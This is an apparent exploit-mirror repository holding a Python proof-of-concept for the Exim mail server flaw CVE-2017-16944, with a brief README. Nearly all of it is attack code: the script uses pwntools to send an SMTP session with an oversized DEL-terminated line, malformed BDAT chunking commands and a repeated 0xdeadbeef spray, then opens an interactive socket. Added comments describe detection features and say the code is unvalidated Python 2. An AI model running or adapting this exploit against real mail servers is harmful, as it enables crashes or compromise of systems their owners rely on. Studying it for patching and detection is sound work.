├── CVE-2017-16944 └── poc.py └── README.md
/CVE-2017-16944/poc.py:
--------------------------------------------------------------------------------
# ARCHIVE FROM https://bugs.exim.org/attachment.cgi?id=1052
# Conversation
# https://bugs.exim.org/show_bug.cgi?id=2199
# https://bugs.exim.org/show_bug.cgi?id=2201
#
#
# CVE-2017-16944 (Associated: CVE-2017-16943)
#
# Archived proof-of-concept as published on the Exim bug tracker (links above).
# What the script visibly does: opens a TCP connection to port 25 on localhost,
# walks through an SMTP envelope (EHLO / MAIL FROM / RCPT TO), sends one
# oversized command line terminated by a DEL (0x7f) byte, then issues BDAT
# chunking commands followed by a large repeated 8-byte pattern, and finally
# hands the socket to the operator.  The target host and port are hard-coded;
# nothing here is parameterised.
#
# NOTE(review): the script is written against Python 2 semantics -- `0x1e00/8`
# relies on integer division and `'a'*6 + p64(...)` concatenates str with the
# bytes returned by p64.  It is archived as published and has not been run or
# validated here.
#
# Defender's view: the on-wire features that distinguish this exchange from
# ordinary SMTP traffic are a ~0x1100-byte command line ending in 0x7f and a
# BDAT chunk immediately followed by a malformed `:BDAT` line; the mitigation is
# the fix referenced in the linked bug reports.

# pip install pwntools
# pwntools is a third-party package (not stdlib); `remote` and `p64` come from it.
from pwn import *

# Hard-coded target: the local SMTP listener.
r = remote('localhost', 25)

# Consume the server greeting, then run a minimal envelope with empty
# MAIL FROM / RCPT TO addresses.  Each recv* blocks until the expected
# text arrives, so a server that does not answer stalls the script.
r.recvline()
r.sendline("EHLO test")
r.recvuntil("250 HELP")
r.sendline("MAIL FROM:")
r.recvline()
r.sendline("RCPT TO:")
r.recvline()
#raw_input()
# 0x1100 bytes of 'a' followed by a single DEL (0x7f) byte, as one line.
r.sendline('a'*0x1100+'\x7f')
#raw_input()
# Wait for the server's response containing the word 'command'.
r.recvuntil('command')
# BDAT (RFC 3030 CHUNKING): a 1-byte chunk, then a malformed second BDAT line.
r.sendline('BDAT 1')
r.sendline(':BDAT \x7f')
# 6 filler bytes plus 0x1e00 bytes of the 8-byte little-endian value 0xdeadbeef
# repeated (p64 packs a 64-bit little-endian integer).
s = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)
r.send(s+ ':\r\n')
r.recvuntil('command')
#raw_input()
# A lone newline, then drop into an interactive session on the open socket.
r.send('\n')
r.interactive()
exit()
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# PoC-Exploit-Mirror
Archive Mirror for recently republished PoC/Exploit code.

Purpose of this mirror is to provide an ad-hoc bridge between mailing groups and exploit archive publishing. You can probably ignore it.
--------------------------------------------------------------------------------